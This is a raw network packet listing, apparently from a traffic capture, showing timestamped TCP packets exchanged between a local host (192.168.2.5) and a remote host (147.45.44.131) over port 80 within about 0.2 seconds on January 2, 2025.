Jan 2, 2025 19:14:15.549937010 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.549962997 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.549983978 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.549983978 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.550029993 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.550040960 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.550056934 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.550067902 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.550079107 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.550085068 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.550108910 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.550121069 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.550122023 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.550158024 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.550193071 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.550204992 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.550220966 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.550231934 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.550232887 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.550244093 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.550250053 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.550255060 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.550266981 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.550319910 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.550347090 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.550421953 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.550434113 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.550443888 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.550455093 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.550455093 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.550497055 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.550553083 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.550602913 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.550615072 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.550626040 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.550636053 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.550647974 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.550657988 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.550671101 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.550673962 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.550681114 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.550692081 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.550709963 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.550709963 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.550709963 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.550751925 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.550751925 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.550755024 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.551105022 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.551116943 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.551129103 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.551135063 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.551179886 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.551213026 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.551224947 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.551234961 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.551237106 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.551249981 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.551255941 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.551260948 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.551265001 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.551285982 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.551335096 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.551335096 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.551338911 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.551358938 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.551371098 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.551383018 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.551392078 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.551403046 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.551426888 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.551429987 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.551440001 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.551446915 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.551455975 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.551471949 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.551490068 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.551501036 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.551511049 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.551522017 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.551573992 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.551573992 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.551628113 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.551640034 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.551651001 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.551661015 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.551667929 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.551678896 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.551693916 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.551702023 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.551804066 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.596726894 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.596808910 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.596822977 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.596833944 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.596844912 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.596856117 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.596865892 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.596896887 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.597573996 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.634069920 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.634083033 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.634094000 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.634107113 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.634119034 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.634130955 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.634141922 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.634152889 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.634177923 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.634206057 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.634988070 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.635056973 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.635068893 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.635080099 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.635090113 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.635101080 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.635112047 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.635133028 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.635162115 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.635184050 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.635190010 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.635191917 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.635196924 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.635201931 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.635211945 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.635226965 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.635231018 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.635253906 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.635253906 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.635253906 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.635282040 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.635293961 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.635304928 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.635329962 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.635329962 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.635394096 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.635406017 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.635416031 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.635432005 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.635490894 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.636169910 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.636209011 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.636219025 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.636229038 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.636246920 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.636248112 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.636257887 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.636269093 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.636296988 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.636308908 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.636317968 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.636317968 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.636334896 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.636343956 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.636403084 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.636414051 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.636415958 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.636425018 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.636430979 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.636456013 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.636492968 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.636504889 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.636514902 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.636524916 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.636540890 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.636540890 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.636698961 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.636713028 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.636715889 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.636746883 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.636746883 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.636755943 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.636768103 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.636785984 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.636792898 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.636796951 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.636816025 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.636822939 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.636831045 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.636842012 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.636852980 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.636878014 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.636909008 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.636909962 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.636913061 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.636923075 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.636925936 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.636925936 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.636997938 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.636997938 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.637031078 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.637041092 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.637058973 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.637068987 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.637083054 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.637098074 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.637120008 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.637141943 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.637151957 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.637170076 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.637187958 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.637200117 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.637212038 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.637233019 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.637263060 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.637263060 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.637320995 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.637337923 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.637342930 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.637355089 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.637363911 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.637377024 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.637387991 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.637398005 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.637408018 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.637408018 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.637434006 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.637445927 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.637455940 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.637466908 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.637478113 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.637547016 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.637608051 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.637857914 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.637867928 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.637914896 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.637927055 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.637937069 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.637948990 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.637962103 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.637972116 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.637983084 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.637986898 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.637986898 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.638010025 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.638010025 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.638019085 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.638031006 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.638041019 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.638057947 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.638134003 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.638144970 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.638155937 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.638166904 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.638169050 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.638175011 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.638199091 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.638199091 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.638212919 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.638246059 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.638257027 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.638268948 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.638294935 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.638310909 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.638312101 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.638379097 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.638379097 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.638379097 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.638446093 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.638463020 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.638479948 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.638489962 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.638500929 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.638509989 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.638514042 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.638525963 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.638535023 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.638561010 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.683583975 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.683604956 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.683618069 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.683628082 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.683640957 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.683651924 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.683662891 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.683665991 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.683883905 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.734077930 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734100103 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734114885 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734148979 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.734158993 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734177113 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734189034 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734199047 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734210014 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734220028 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734231949 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734246016 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.734246016 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.734301090 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.734301090 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.734337091 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734349012 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734360933 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734376907 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734389067 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734401941 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734412909 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734421968 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.734421968 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734421968 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.734436989 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734452963 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.734453917 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734466076 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734476089 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734486103 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734496117 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734507084 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734515905 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.734515905 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.734517097 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734515905 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.734529972 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734549999 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734566927 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734569073 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.734577894 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734589100 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734600067 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734606981 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.734611988 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734627962 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734630108 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.734638929 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734647036 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.734658003 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734668970 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734679937 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734680891 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.734693050 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734704971 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734731913 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.734745026 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734755993 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.734756947 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734770060 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734780073 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.734790087 CET	80	49721	147.45.44.131	192.168.2.5
